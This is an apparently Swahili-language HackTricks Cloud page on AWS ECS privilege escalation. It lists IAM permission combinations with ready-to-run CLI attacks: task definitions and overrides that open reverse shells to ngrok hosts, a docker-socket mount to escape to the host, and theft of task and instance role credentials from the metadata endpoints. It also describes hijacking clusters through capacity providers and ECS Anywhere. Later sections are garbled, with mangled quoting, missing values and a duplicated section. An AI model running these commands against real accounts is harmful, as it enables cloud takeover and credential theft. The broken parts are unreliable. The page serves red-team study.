HackTricks CloudAWS - ECS Privesc
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na đŹ Discord group au the telegram group au utufuate kwenye Twitter đŚ @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
ECS
Taarifa zaidi kuhusu ECS zipo katika:
iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask
Mshambuliaji anayetumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask katika ECS anaweza kuunda task definition mpya yenye container hatari ambayo inapora metadata credentials na kuiendesha.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
Athari Inayowezekana: Privesc ya moja kwa moja kwa ECS role tofauti.
iam:PassRole,ecs:RunTask
Mshambuliaji ambaye ana ruhusa za iam:PassRole na ecs:RunTask anaweza kuanzisha task mpya ya ECS na kubadilisha thamani za execution role, task role na command za container. Amri ya CLI ecs run-task ina flag ya --overrides ambayo inaruhusu kubadilisha kwa runtime executionRoleArn, taskRoleArn na command ya container bila kuharibu task definition.
IAM roles zilizobainishwa kwa taskRoleArn na executionRoleArn lazima ziweze kutumiwa (assumed) na ecs-tasks.amazonaws.com katika trust policy zao.
Pia, mshambuliaji anahitaji kujua:
- Jina la ECS cluster
- Subnet ya VPC
- Security group (Kama hakuna security group iliyoainishwa, ile ya chaguo-msingi itatumika)
- Jina la Task Definition na revision
- Jina la Container
aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'
Katika snippet ya code hapo juu attacker anabadilisha tu thamani ya taskRoleArn. Hata hivyo, attacker lazima awe na ruhusa ya iam:PassRole juu ya taskRoleArn iliyotajwa kwenye amri na executionRoleArn iliyotajwa katika task definition ili attack iwezekane.
Kama IAM role ambayo attacker anaweza kuipass ina privileges za kutosha za kupakua image ya ECR na kuanzisha ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer,ecr:BatchGetImage,ecr:GetAuthorizationToken) basi attacker anaweza kuchagua IAM role ile ile kwa executionRoleArn na taskRoleArn katika amri ya ecs run-task.
aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'
Athari Inayoweza Kutokea: privesc ya moja kwa moja kwa ECS task role yoyote.
iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask
Kama katika mfano uliopita, mshambuliaji akitumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask ndani ya ECS anaweza kuunda task definition mpya yenye container mbaya ambayo inaiba metadata credentials na kuendesha.\
Hata hivyo, katika kesi hii, inahitajika kuwepo kwa container instance ili kuendesha task definition hiyo mbaya.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa role yoyote ya ECS.
iam:PassRole, ecs:RegisterTaskDefinition, (`ecs:UpdateService|ecs:CreateService)
Kama ilivyo katika mfano wa awali, mshambuliaji anayetumia vibaya ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService kwenye ECS anaweza kuunda task definition mpya yenye container yenye madhara ambayo inaiba cheti za metadata na kuiendesha kwa kuunda service mpya yenye angalau task 1 inayoendesha.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>
Potential Impact: Privesc ya moja kwa moja kwa yoyote role ya ECS.
iam:PassRole, (ecs:UpdateService|ecs:CreateService)
Kwa kweli, kwa ruhusa hizo peke yake inawezekana kutumia overrides ili kutekeleza amri zozote ndani ya container kwa role yoyote kwa kitu kama:
aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
Athari Inayoweza Kutokea: Direct privesc to any ECS role.
ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
Hali hii ni kama zile zilizo hapo awali lakini bila ruhusa ya iam:PassRole.
Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha container yoyote, hata ikiwa haina role, unaweza kuendesha privileged container ili kutoroka hadi kwenye node na kunyangâanya EC2 IAM role na role za container nyingine za ECS zinazofanya kazi kwenye node.
Unaweza hata kulazimisha tasks nyingine ziendeshe ndani ya EC2 instance uliyotekeleza ili kunyangâanya credentials zao (as discussed in the Privesc to node section).
Warning
Ushambulizi huu unaweza kufanyika tu ikiwa the ECS cluster is using EC2 instances na si Fargate.
printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json
printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json
aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2
# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza execute commands ndani ya container inayofanya kazi na exfiltrate the IAM role attached to it (unahitaji ruhusa za describe kwa sababu ni muhimu kuendesha aws ecs execute-command).
Hata hivyo, ili kufanya hivyo, container instance inahitaji kuwa inaendesha ExecuteCommand agent (ambayo kwa default haisakinishwi).
Kwa hivyo, mshambuliaji anaweza kujaribu:
- Try to run a command katika kila container inayofanya kazi
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo " Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done
# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
Mara unapokuwa na shell ndani ya container, kwa kawaida unaweza extract the task role credentials kutoka kwa task credentials endpoint na kuvitumia tena nje ya container:
# Inside the container:
echo "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | jq
# If you want to use them locally, print shell exports:
python3 - <<'PY'
import json, os, urllib.request
u = "http://169.254.170.2" + os.environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
d = json.load(urllib.request.urlopen(u, timeout=2))
print("export AWS_ACCESS_KEY_ID=" + d["AccessKeyId"])
print("export AWS_SECRET_ACCESS_KEY=" + d["SecretAccessKey"])
print("export AWS_SESSION_TOKEN=" + d["Token"])
PY
- Ikiwa ana
ecs:RunTask, endesha task kwaaws ecs run-task --enable-execute-command [...] - Ikiwa ana
ecs:StartTask, endesha task kwaaws ecs start-task --enable-execute-command [...] - Ikiwa ana
ecs:CreateService, tengeneza service kwaaws ecs create-service --enable-execute-command [...] - Ikiwa ana
ecs:UpdateService, sasisha service kwaaws ecs update-service --enable-execute-command [...]
Unaweza kupata mifano ya hizo chaguzi katika sehemu za hapo awali za ECS privesc.
Potential Impact: Privesc kwa role tofauti iliyounganishwa na containers.
ssm:StartSession
Angalia katika ssm privesc page jinsi unaweza kutumia vibaya ruhusa hii ili privesc kwa ECS:
iam:PassRole, ec2:RunInstances
Angalia katika ec2 privesc page jinsi unaweza kutumia vibaya ruhusa hizi ili privesc kwa ECS:
ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole
Mshambuliaji mwenye ruhusa hizi mara nyingi anaweza turn âcluster membershipâ into a security boundary bypass:
- Sajili attacker-controlled EC2 instance katika victim ECS cluster (akigeuzwa kuwa container instance)
- Weka sifa za kawaida za container instance attributes ili kukidhi placement constraints
- Mruhusu ECS kupanga tasks kwenye host hiyo
- Nyakua task role credentials (na siri/taarifa yoyote ndani ya container) kutoka kwa task inayokimbia kwenye host yako
Muhtasari wa mtiririko:
- Pata hati ya utambulisho ya EC2 instance + saini kutoka kwa EC2 instance unayodhibiti katika akaunti lengwa (kwa mfano kupitia SSM/SSH):
curl -s http://169.254.169.254/latest/dynamic/instance-identity/document > iidoc.json
curl -s http://169.254.169.254/latest/dynamic/instance-identity/signature > iisig
- Sajili ndani ya cluster lengwa, kwa hiari weka sifa ili kukidhi vizingiti vya uwekaji:
aws ecs register-container-instance \
--cluster "$CLUSTER" \
--instance-identity-document file://iidoc.json \
--instance-identity-document-signature "$(cat iisig)" \
--attributes name=labtarget,value=hijack
- Thibitisha kwamba imejiunga:
aws ecs list-container-instances --cluster "$CLUSTER"
- Anzisha task / sasisha service ili kitu kipangwe kwenye instance, kisha kusanya task role creds kutoka ndani ya task:
# On the container host:
docker ps
docker exec -it <container-id> sh
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
- Kusajili container instance kwa kutumia instance identity document/signature kunaonyesha kuwa una ufikiaji wa EC2 instance katika akaunti ya lengo (au imevamiwa). Kwa cross-account âbring your own EC2â, ona mbinu ya ECS Anywhere katika ukurasa huu.
- Placement constraints kwa kawaida hutegemea container instance attributes. Orodhesha kupitia
ecs:DescribeServices,ecs:DescribeTaskDefinition, naecs:DescribeContainerInstancesili kujua attributes gani unahitaji kuweka.
ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets
Note
TODO: Jaribu hili
Mshambuliaji ambaye ana ruhusa ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda malicious task set kwa ajili ya existing ECS service na kusasisha primary task set. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya huduma.
# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json
aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"
# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
Athari Inayowezekana: Kutekeleza arbitrary code kwenye huduma iliyoharibiwa, kunaweza kuathiri utendakazi wake au exfiltrating data nyeti.
Marejeo
Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
Mshambuliaji mwenye ruhusa za kusimamia ECS capacity providers na kusasisha services anaweza kuunda EC2 Auto Scaling Group anayedhibiti, kuiwekea ndani ya ECS Capacity Provider, kuihusisha na cluster lengwa, na kuhama service ya mwathirika kutumia provider hii. Kisha Tasks zitawekewa ratiba kwenye EC2 instances zinazodhibitiwa na mshambuliaji, zikiruhusu upatikanaji wa ngazi ya OS kuchunguza containers na kuiba task role credentials.
Commands (us-east-1):
-
Mahitaji ya awali
-
Unda Launch Template for ECS agent to join target cluster
-
Unda Auto Scaling Group
-
Unda Capacity Provider from the ASG
-
Husisha the Capacity Provider na cluster (hiari kama default)
-
Hamisha service kwenye provider yako
-
Thibitisha tasks zinaishia kwenye instances za mshambuliaji
-
Hiari: Kutoka kwenye EC2 node, docker exec ndani ya containers lengwa na soma http://169.254.170.2 ili kupata task role credentials.
-
Usafishaji
Athari Inayowezekana: EC2 nodes zinazodhibitiwa na mshambuliaji zinapokea tasks za waathirika, hivyo kuwezesha upatikanaji wa ngazi ya OS kwa containers na wizi wa task IAM role credentials.
Amri hatua kwa hatua (nakili/weka)
export AWS_DEFAULT_REGION=us-east-1 CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster # Instance profile for ECS nodes aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || trueVPC=vpc-18e6ac62 SUBNETS=
AMI=ami-0b570770164588ab4 USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo= LT_ID=
ASG_ARN=
CP_NAME=htcp-8797 aws ecs create-capacity-provider âname âauto-scaling-group-provider âautoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLEDâ aws ecs put-cluster-capacity-providers âcluster ââ âcapacity-providers âdefault-capacity-provider-strategy capacityProvider=,weight=1
SVC=
Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service âcluster ââ âservice ââ âcapacity-provider-strategy capacityProvider=,weight=1 âforce-new-deployment
TASK= CI= aws ecs describe-container-instances âcluster ââ âcontainer-instances ââ âquery containerInstances[0].ec2InstanceId âoutput text
Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
Dhalilisha ECS Anywhere ili kusajili mwenyeji unaodhibitiwa na mshambuliaji kama EXTERNAL container instance katika ECS cluster ya mwathiriwa na kuendesha tasks kwenye mwenyeji huyo ukitumia privileged task na execution roles. Hii inampa mshambuliaji udhibiti wa ngazi ya OS juu ya mahali tasks zinaendeshwa (mfano: mashine yako mwenyewe) na kuruhusu wizi wa task credentials/data kutoka kwa tasks na volumes zilizounganishwa bila kugusa capacity providers au ASGs.
-
Ruhusa zinazohitajika (mfano minimal):
-
ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
-
ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
-
iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)
-
logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
-
Athari: Endesha containers za arbitrary zenye taskRoleArn uliyochagua kwenye mwenyeji wa mshambuliaji; exfiltrate task-role credentials kutoka 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; pata ufikivu kwa volumes yoyote zilizounganishwa na tasks; njia hii ni ya utulivu zaidi kuliko kubadilisha capacity providers/ASGs.
Hatua
- Unda/tafuta cluster (us-east-1)
aws ecs create-cluster --cluster-name ht-ecs-anywhere
- Unda ECS Anywhere role na SSM activation (kwa on-prem/EXTERNAL instance)
aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)
- Toa attacker host na jisajili moja kwa moja kama EXTERNAL (mfano: small AL2 EC2 kama âonâpremâ)
user-data.sh
```bash #!/bin/bash set -euxo pipefail amazon-linux-extras enable docker || true yum install -y docker curl jq systemctl enable --now docker curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh" chmod +x /root/ecs-anywhere-install.sh /root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1 ```task def (EXTERNAL launch)
cat > td-external.json << âJSONâ
{
âfamilyâ: âht-externalâ,
ârequiresCompatibilitiesâ: [ âEXTERNALâ ],
ânetworkModeâ: âbridgeâ,
âmemoryâ: â256â,
âcpuâ: â128â,
âexecutionRoleArnâ: âarn:aws:iam::
âcontainer-instances $CI
6) Kutoka hapa unadhibiti host inayoiendesha tasks. Unaweza kusoma task logs (ikiwa awslogs) au moja kwa moja exec kwenye host ili exfiltrate credentials/data kutoka kwa tasks zako.
#### Mfano wa amri (viashiria)
### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
Attacker akiwa na ruhusa za kusimamia ECS capacity providers na kusasisha services anaweza kuunda EC2 Auto Scaling Group anayedhibiti, kuiweka ndani ya ECS Capacity Provider, kuihusisha na cluster lengwa, na kuhama victim service ili itumie provider hii. Tasks zitapangwa kisha kwenye EC2 instances zinazoendeshwa na attacker, zikiruhusu OS-level access ya kukagua containers na kuiba task role credentials.
Amri (us-east-1):
- Mahitaji ya awali
- Tengeneza Launch Template kwa ajili ya ECS agent kujiunga na cluster lengwa
- Unda Auto Scaling Group
- Tengeneza Capacity Provider kutoka kwa ASG
- Unganisha Capacity Provider na cluster (hiari kama chaguo-msingi)
- Hamisha service kwa provider yako
- Thibitisha tasks zimewekwa kwenye attacker instances
- Hiari: Kutoka kwenye node ya EC2, docker exec ndani ya target containers na soma http://169.254.170.2 ili kupata task role credentials.
- Usafishaji
**Athari Inayowezekana:** EC2 nodes zinazosimamiwa na attacker zinapokea victim tasks, kuruhusu upatikanaji wa OS-level wa kukagua containers na uibiwa wa task IAM role credentials.
> [!TIP]
> Jifunze na ufanye mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Saidia HackTricks</summary>
>
> - Angalia the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) au the [**telegram group**](https://t.me/peass) au **utufuate** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki hacking tricks kwa kutuma PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>